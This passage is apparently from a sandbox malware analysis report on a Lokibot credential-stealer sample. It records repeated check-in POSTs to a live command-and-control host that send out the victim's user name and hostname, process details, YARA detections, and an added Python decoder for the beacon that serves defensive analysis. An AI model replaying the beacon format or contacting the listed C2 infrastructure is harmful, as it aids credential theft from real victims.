Feb 22, 2021 19:14:41.603157043 CET | 6261 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:41.979253054 CET | 6261 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
76 | 192.168.2.4 | 49847 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:42.561340094 CET | 6262 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:42.895849943 CET | 6263 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:43.262561083 CET | 6263 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
77 | 192.168.2.4 | 49848 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:43.857917070 CET | 6264 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:44.196196079 CET | 6264 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:44.564707994 CET | 6265 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
78 | 192.168.2.4 | 49849 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:45.133831978 CET | 6266 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:45.479481936 CET | 6266 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:45.854491949 CET | 6267 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
79 | 192.168.2.4 | 49850 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:46.440406084 CET | 6268 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:46.785778046 CET | 6268 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:47.171031952 CET | 6268 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:47 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.4 | 49755 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:13:13.445902109 CET | 1545 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:13:13.780885935 CET | 1545 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:13:14.146862984 CET | 1545 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:13:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
80 | 192.168.2.4 | 49851 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:47.730696917 CET | 6269 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:48.079566956 CET | 6270 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:48.464941978 CET | 6270 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
81 | 192.168.2.4 | 49852 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:49.051549911 CET | 6271 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:49.390254974 CET | 6271 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:49.756752014 CET | 6271 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
82 | 192.168.2.4 | 49853 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:50.340811014 CET | 6272 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:50.675412893 CET | 6273 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:51.040293932 CET | 6273 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
83 | 192.168.2.4 | 49854 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:51.621969938 CET | 6274 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:51.967381954 CET | 6274 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:52.342394114 CET | 6275 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
84 | 192.168.2.4 | 49855 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:52.907812119 CET | 6275 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:53.244462967 CET | 6276 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:53.614855051 CET | 6276 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
85 | 192.168.2.4 | 49856 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:54.200424910 CET | 6277 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:54.545985937 CET | 6277 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:54.924731016 CET | 6277 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
86 | 192.168.2.4 | 49857 | 203.170.84.89 | 80 | C:\Users\user\Desktop\Conan Fegan - Aluminium.exe

Timestamp | kBytes transferred | Direction | Data
Feb 22, 2021 19:14:55.486345053 CET | 6278 | OUT | POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
Feb 22, 2021 19:14:55.825711966 CET | 6279 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Feb 22, 2021 19:14:56.190764904 CET | 6279 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Mon, 22 Feb 2021 18:14:56 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.2.34
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          87192.168.2.449858203.170.84.8980C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          TimestampkBytes transferredDirectionData
                                          Feb 22, 2021 19:14:56.748662949 CET6280OUTPOST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                          Feb 22, 2021 19:14:57.082882881 CET6280OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                           Feb 22, 2021 19:14:57.456227064 CET | 6281 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:14:57 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.


                                           Session ID: 9 | Source: 192.168.2.4:49756 | Destination: 203.170.84.89:80 | Process: C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                           Timestamp | kBytes transferred | Direction | Data
                                           Feb 22, 2021 19:13:14.755155087 CET | 1546 | OUT | POST /wap121/five/fre.php HTTP/1.0
                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                          Host: www.ritcophysiotherapy.com.au
                                          Accept: */*
                                          Content-Type: application/octet-stream
                                          Content-Encoding: binary
                                          Content-Key: AD291CE
                                          Content-Length: 163
                                          Connection: close
                                           Feb 22, 2021 19:13:15.090272903 CET | 1546 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                          Data Ascii: (ckav.rujones910646DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                           Feb 22, 2021 19:13:15.458630085 CET | 1547 | IN | HTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Mon, 22 Feb 2021 18:13:15 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Connection: close
                                          Vary: Accept-Encoding
                                          X-Powered-By: PHP/7.2.34
                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                          Data Ascii: File not found.
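Decoding the check-in request shown in sessions 87 and 9. This is an added example and not part of the Joe Sandbox report. The record framing is read directly off the captured bytes: a 16-bit version (0x12), a 16-bit payload type (0x28), then a run of string records, each a 16-bit flag (1 = UTF-16LE, 0 = single-byte), a 32-bit byte length and the bytes. The field labels binary_id, user, domain and hostname are assumptions for readability; the report does not name them. The body is the "Data Raw" string as displayed, which stops after 82 of the 163 declared bytes, so the decoder has to report a cut-off record rather than fail on it.

```python
"""Decode the Lokibot check-in captured above (sessions 87 and 9).

Added example, not part of the Joe Sandbox report. The record framing is
read off the captured bytes: u16 version, u16 payload type, then string
records of u16 flag (1 = UTF-16LE, 0 = single-byte), u32 byte length,
bytes. The field labels in FIELD_NAMES are assumptions.
"""
import struct

# Request headers as shown in the report (session 87).
CAPTURED_REQUEST = """\
POST /wap121/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: www.ritcophysiotherapy.com.au
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: AD291CE
Content-Length: 163
Connection: close
"""

# "Data Raw" bytes as displayed in the report; the display stops at 82 of
# the 163 declared bytes, so the last record is cut off.
CAPTURED_BODY_HEX = (
    "12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 "
    "6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 31 00 30 00 36 00 "
    "34 00 36 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 "
    "2d 00 37 00 31 00 36 00 54 00 37"
)

FIELD_NAMES = ("binary_id", "user", "domain", "hostname")  # assumed labels
LOKI_USER_AGENT = "Mozilla/4.08 (Charon; Inferno)"


def parse_headers(request_text):
    """Return the request line plus headers keyed by lower-cased name."""
    lines = request_text.strip().splitlines()
    headers = {"request_line": lines[0]}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def header_indicators(headers):
    """Header-level traits of this request that a network signature can key on."""
    hits = []
    if headers.get("user-agent") == LOKI_USER_AGENT:
        hits.append("User-Agent " + LOKI_USER_AGENT)
    if "content-key" in headers:
        hits.append("Content-Key header present")
    if headers.get("content-encoding") == "binary":
        hits.append("Content-Encoding: binary")
    return hits


def decode_record(flag, raw):
    """Decode one record body; a dangling odd byte of a cut UTF-16 string is dropped."""
    if flag == 1:
        return raw[: len(raw) // 2 * 2].decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def parse_beacon(body, declared_length=None):
    """Walk the records; report truncation instead of raising on a cut capture."""
    if len(body) < 4:
        raise ValueError("body shorter than the 4-byte header")
    version, payload_type = struct.unpack_from("<HH", body, 0)
    result = {"version": version, "payload_type": payload_type,
              "fields": [], "truncated": False, "missing_bytes": 0}
    offset, index = 4, 0
    while offset < len(body):
        if offset + 6 > len(body):          # the record header itself is cut
            result["truncated"] = True
            break
        flag, length = struct.unpack_from("<HI", body, offset)
        offset += 6
        raw = body[offset:offset + length]
        offset += length
        name = FIELD_NAMES[index] if index < len(FIELD_NAMES) else f"field{index}"
        index += 1
        partial = len(raw) < length
        result["fields"].append({"name": name, "unicode": flag == 1,
                                 "value": decode_record(flag, raw),
                                 "partial": partial})
        result["truncated"] |= partial
    if declared_length is not None and declared_length > len(body):
        result["truncated"] = True
        result["missing_bytes"] = declared_length - len(body)
    return result


def analyse(request_text=CAPTURED_REQUEST, body_hex=CAPTURED_BODY_HEX):
    """Combine header indicators with the decoded body for one captured request."""
    headers = parse_headers(request_text)
    declared = int(headers["content-length"]) if "content-length" in headers else None
    return {"indicators": header_indicators(headers),
            "beacon": parse_beacon(bytes.fromhex(body_hex), declared)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyse(), indent=2))
```

On the captured bytes this yields version 0x12, payload type 0x28, the single-byte record "ckav.ru", the UTF-16 records "jones" and "910646", and a cut hostname record whose first 12 characters are "DESKTOP-716T", with 81 bytes of the declared 163 missing. The "Data Ascii" rendering on the page strips non-printable bytes, which is why the remainder shows up as "7108F9C4E9C79A3B52B3F739430"; the "0" in front of the 24 hex characters is most plausibly the 0x30 length byte (48 bytes, i.e. 24 UTF-16 characters) of the following record, an inference from the framing rather than something the report states. The Content-Key value is carried through unchanged; the report does not show how it is derived, so the decoder does not try to recompute it.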


                                          Code Manipulations

                                          Statistics

                                           CPU Usage

                                           Memory Usage

                                           High Level Behavior Distribution

                                           Behavior

                                          System Behavior

                                          General

                                          Start time:19:12:51
                                          Start date:22/02/2021
                                          Path:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\Conan Fegan - Aluminium.exe'
                                          Imagebase:0x960000
                                          File size:398848 bytes
                                          MD5 hash:708EE64939578FBB07010E20F6C7672C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.651632346.0000000003D09000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.651436438.0000000002D01000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:19:12:59
                                          Start date:22/02/2021
                                          Path:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\Conan Fegan - Aluminium.exe
                                          Imagebase:0xc20000
                                          File size:398848 bytes
                                          MD5 hash:708EE64939578FBB07010E20F6C7672C
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000005.00000002.901084712.000000000121A000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Loki_1, Description: Loki Payload, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000005.00000002.900810400.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Disassembly

                                          Code Analysis


                                            Executed Functions

                                            Strings
                                            Memory Dump Source
